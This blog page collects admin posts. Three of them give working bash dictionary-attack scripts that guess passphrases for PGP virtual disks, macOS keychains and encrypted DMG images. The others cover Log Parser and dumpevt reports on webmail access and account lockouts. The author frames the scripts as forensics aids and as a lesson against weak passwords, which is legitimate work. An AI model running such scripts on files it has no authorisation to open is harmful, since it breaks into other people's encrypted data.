Mac Shell Script – Crack PGP Virtual Disk (PGD)

Today I was not up for doing any full program code.  On top of that I recorded an upcoming Typical Mac User show with Victor answering some listener questions about file encryption.  One of the things we talked about was PGP for Mac.  I got to wondering.  What are the odds that they provide a command line option for mounting PGP encrypted discs?  Can I do yet another dictionary attack script?

Here is what I have initially found.  Note we are talking about a PGP virtual disk file setup for passphase NOT key authentication.  You must have the commercial Mac PGP Whole Disk Encryption application installed.

There is a pgpdisk –mount command.  So can we toss it in a loop like we did for DMG files?  Why of course we can!  Note that you need to change to the desired dictionary path and file.   Same for the target .PGD file you want.  Note on the PGD file my example is PGPTest with the full path minus the extension in the below example.

You will notice when you run your attack that you see some text about “Error -11998 – buffer too small”  This is because normally if the passphrase you enter is wrong it will prompt you three more times.  The way we are piping in at the front of the line with the echo we cause it to error and ignore those multiple entry attempts and keep going through our dictionary file.

#!/bin/bash

for word in $(cat /Volumes/ExternalDrive/Dictionaries/test.txt | grep -v “#”)

do

echo -n $word | pgpdisk –mount /Volumes/MyBook/PGPDisks/PGPTest –passphrase $word

if [[ $? = 0 ]]

then

echo “Password found!”

echo $word

exit 0

fi

done

echo “password not found :(”

exit 1

Share

Mac Shell Script – Crack Keychain

While I work out an updated copy of crowbarDMG to go after keychains I wanted to give you a quick shell script to achieve the same thing.  Long time ago I posted a script for going after DMG files.  It takes only a slight edit to make it work for keychain files.  You will want to change the test.txt file for your dictionary file and keytest.keychain for your desired file.

#!/bin/bash

for word in $(cat ~/test.txt | grep -v “#”)

do

security unlock-keychain -p $word ~/keytest.keychain

if [[ $? = 0 ]]

then
echo “Password found”
echo $word
exit 0

fi

done
echo “Password not found”
exit 1

Share

SNMP Auditing

Here is an easy way to find all snmp devices on your network and check if they are running any of a list of common strings you want to test for.  And do it without risking a write access check.  I did the following with my Mac PowerBook just using the C compiler CC.

Continue reading “SNMP Auditing”

Share

Disc Image – Why not to use a plain Dictionary Word

In the process of playing with backing up to disc images I wanted to play around how to automate the password entry. I may get into why in a future post. Whatever you do, do not use a plain dictionary word to secure your images. Here is why. I based it on the scripts I found at: http://ask.metafilter.com/47171/How-to-crack-a-disk-image

Modified and tested. Worked like a champ when I added my chosen password to a dictionary text file of words. In the below example I used a path to where I have a large collection of dictionary files used for password cracking in forensics etc. This is not the fastest thing in the world but it works if the chosen password shows up in the word lists you throw at the image.

#!/bin/bash

for word in $(cat /Volumes/ExternalDrive/Dictionaries/test.txt | grep -v “#”)

do

echo -n $word | hdiutil attach /Volumes/iPod/Backup/Backup.sparseimage -stdinpass

if [[ $? = 0 ]]

then

echo “Password found!”

echo $word

exit 0

fi

done

echo “password not found :(”

exit 1

Share

LogParser – MS Exchange Webmail User Access List

I had to make a list of whom accessed the webmail system at work and when. Here is a way to do it with logparser if you have your IIS logs in normal IIS format.

  1. Get the IIS logs from the web server front end of the
    webmail server. Dump them into a location like g:\logs\owa
  2. Grab a copy of MS Log Parser
  3. Make a text file called WebAccess.sql and put the following
    commands in the sql text file.
    SELECT
    cs-username, Date
    INTO STDOUT
    FROM g:\logs\owa\*
    WHERE
    (cs-username IS NOT NULL)
    AND
    (sc-status = 200)
    GROUP BY Date, cs-username
  4. Put the ms log parser and your WebAccess.sql into the g:\logs folder
  5. Execute this command at a command line in the folder with ms log
    parser
    Logparser.exe file:WebmailAccess.sql -i:IISW3C -o:CSV
  6. If you want it to go to a file just add > WebmailUsers.csv to the end
  7. of the command in step four above. That will redirect the output to a csv you can open in excel.
Share

Fun with dumpevt and MS Log Parser

I have been having fun learning how to combine Dumpevt from Somarsoft and MS Log Parser. Let me say once you start to get the hang of it you can do some cool things. Also MS makes a great PDF for Security Event information. You can modify the below to make your own reports for those various IDs.
For example the below makes a CSV (comma seperated file) showing all user accounts who had EventID 644 lockouts the previous day. Download dumpevt, MS Log parser the header file I made all into a folder together. Then put the below commands into a bat file in the same folder. Remove my comments that are in bold.

  • First we call dumpevt for three domain controllers. Obviously this bat file has to be executed as a user whom has rights to pull the logs remotely. Dumpevt will actually concatenate the dumps into one file.

del c:\logs\644.csv
del c:\logs\errors.txt
dumpevt /computer=PDC /logfile=sec /outdir=c:\logs\ /outfile=644.csv /all >> c:\logs\errors.txt
dumpevt /computer=BDC01 /logfile=sec /outdir=c:\logs\ /outfile=644.csv /all >> c:\logs\errors.txt
dumpevt /computer=BDC02 /logfile=sec /outdir=c:\logs\ /outfile=644.csv /all >> c:\logs\errors.txt

  • Second we create a temp.csv file concatenating the header I provided with the output of the dumpevt calls.

type dumpevt-header.csv > temp.csv
type 644.csv >> temp.csv

  • Next we call Log Parser. We tell it the input is in CSV format and the first row is the header. We specify what format we want the timestamps in for output. Next we select all fields, parse out the user account name where eventID is 644 and the date is the previous day. We go from temp.csv into a new file temp2.csv and have the output in date-time order.

LogParser -i:CSV -headerRow on -iTSFormat:”yyyy-MM-dd” “SELECT *, SUBSTR(EXTRACT_TOKEN(Strings, 1,’^’), 23) AS Account INTO temp2.csv FROM temp.csv WHERE EventID = 644 AND Date = TO_DATE(SUB( SYSTEM_TIMESTAMP(), TIMESTAMP(‘2’, ‘d’))) ORDER BY DATE, Time

  • Last we run the temp2.csv through Log Parser once more. This will generate a csv file called 644report.csv with the columns Date, Time, Computer and the Account that was locked out. Note it drops all entries where the user account name is blank. This happens with some 644 events. I am not sure yet why but I am still teaching myself all about this log parsing and interpretation.

LogParser -i:CSV -headerRow on -iTSFormat:”yyyy-MM-dd” “SELECT DATE, TIME, Computer, Account INTO 644report.csv FROM temp2.csv WHERE STRLEN(Account) >1”

Share